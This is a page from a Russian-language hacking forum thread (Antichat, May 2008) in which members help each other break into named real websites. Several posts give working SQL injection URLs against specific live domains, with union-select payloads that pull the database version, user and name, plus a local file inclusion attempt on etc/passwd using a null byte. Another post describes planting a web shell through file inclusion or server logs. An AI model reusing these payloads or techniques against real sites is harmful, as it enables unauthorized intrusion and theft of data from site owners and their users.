HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Перезагрузить страницу Ваши вопросы по уязвимостям.
   
Ответ
Страница 199 из 2422 « Первая < 99149189 195 196 197 198 199 200 201 202 203 2092492996991199 > Последняя »
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 17.05.2008, 21:22
n0ne
Постоянный
Регистрация: 01.01.2007
Сообщений: 796
Провел на форуме:
2693408

Репутация: 861


По умолчанию
1SeTh, попробуй etc/passwd. А то что ты указал - не обязательно должно существовать.
 
Ответить с цитированием

  #2  
Старый 17.05.2008, 21:25
1SeTh
Участник форума
Регистрация: 17.02.2006
Сообщений: 189
Провел на форуме:
2406659

Репутация: 34
По умолчанию
да забыл сказать что пробовал etc/passwd на что мне сервер ответил:

Цитата:
Forbidden
You don't have permission to access /main.php on this server.

Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.
и с этим тоже etc/passwd%00
Последний раз редактировалось 1SeTh; 17.05.2008 в 21:27..
 
Ответить с цитированием

  #3  
Старый 17.05.2008, 21:34
Ershik
Постоянный
Регистрация: 07.11.2007
Сообщений: 392
Провел на форуме:
1325167

Репутация: 100
По умолчанию
http://welcomearmenia.com/main.php?id=-1+union+select+1/* - скуля
 
Ответить с цитированием

  #4  
Старый 17.05.2008, 22:19
1SeTh
Участник форума
Регистрация: 17.02.2006
Сообщений: 189
Провел на форуме:
2406659

Репутация: 34
По умолчанию
верно, теперь осталось подобрать поля. Пока что кроме названии текущий базы и рута ничего не смог извлечь
ну еще версии

4.1.22-standardwelcomea_aleks@localhostwelcomea_sdays
Последний раз редактировалось 1SeTh; 17.05.2008 в 22:25..
 
Ответить с цитированием

  #5  
Старый 18.05.2008, 00:52
Велемир
Banned
Регистрация: 19.06.2006
Сообщений: 1,239
Провел на форуме:
1469161

Репутация: 142


По умолчанию
был бы глобальный инклуд.мона было бы подгрузить с сайта шелл.А в локальном инклуде можно выполнить шелл через логи,если повезёт )).ну а в четвёртой версии перебором ток,если нет режима суперотладки:РР.
 
Ответить с цитированием

  #6  
Старый 18.05.2008, 14:26
cheb
Познающий
Регистрация: 31.07.2006
Сообщений: 46
Провел на форуме:
596615

Репутация: 18
По умолчанию
вот к примеру иньекция в ипб 1.3 http://www.letov.org/index.php?act=Members&max_results=30&filter=1&sort _order=asc&sort_key=name&st=1'
каким макаром из нее можно чтото получить?
 
Ответить с цитированием

  #7  
Старый 18.05.2008, 14:30
l-l00K
Leaders of Antichat - Level 4
Регистрация: 26.11.2006
Сообщений: 237
Провел на форуме:
13395217

Репутация: 2097
По умолчанию
cheb
Там инъекция после Limit и имеется order by, в таком случае ничего получить не удастся
__________________
Не занимаюсь коммерцией в любых ее проявлениях.
 
Ответить с цитированием

  #8  
Старый 18.05.2008, 14:37
Basurman
Постоянный
Регистрация: 10.11.2006
Сообщений: 416
Провел на форуме:
5636868

Репутация: 849
По умолчанию
ORDER BY m.name asc
LIMIT 1',30

никаким макаром.
 
Ответить с цитированием

  #9  
Старый 18.05.2008, 14:38
cheb
Познающий
Регистрация: 31.07.2006
Сообщений: 46
Провел на форуме:
596615

Репутация: 18
По умолчанию
спасибо за мега шустрый ответ )))
 
Ответить с цитированием

  #10  
Старый 18.05.2008, 18:28
MaSter GeN
Познающий
Регистрация: 26.01.2008
Сообщений: 71
Провел на форуме:
280720

Репутация: 141
По умолчанию
вообшем такая проблема нашел скуль в 2х в разных параметрах на одном сайте в одном есть полные отсчеты обшибках но нет вывода на экран в другом нету отсчета но есть вывод на экран
вотс первый
Код:
http://www.revolution.co.uk/_forum.php?neuron=1 union select null,null,null,null,null,null,null,null,null,null,null,null,null from users/*
проходит без ошибок то есть таблица "users" существует
во втором
запрос вида
Код:
http://www.revolution.co.uk/_forum.php?neuron=1&topic=4981&message=-58008 union select 1,aes_decrypt(aes_encrypt(version(),0x71), 0x71),3,aes_decrypt(aes_encrypt(user(),0x71), 0x71),aes_decrypt(aes_encrypt(database(),0x71), 0x71),6,7,8,9/*
выдает user,version,database а вот на from userS материться оч интересно почему ?
 
Ответить с цитированием
Ответ
Страница 199 из 2422 « Первая < 99149189 195 196 197 198 199 200 201 202 203 2092492996991199 > Последняя »



« Предыдущая тема | Следующая тема »
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.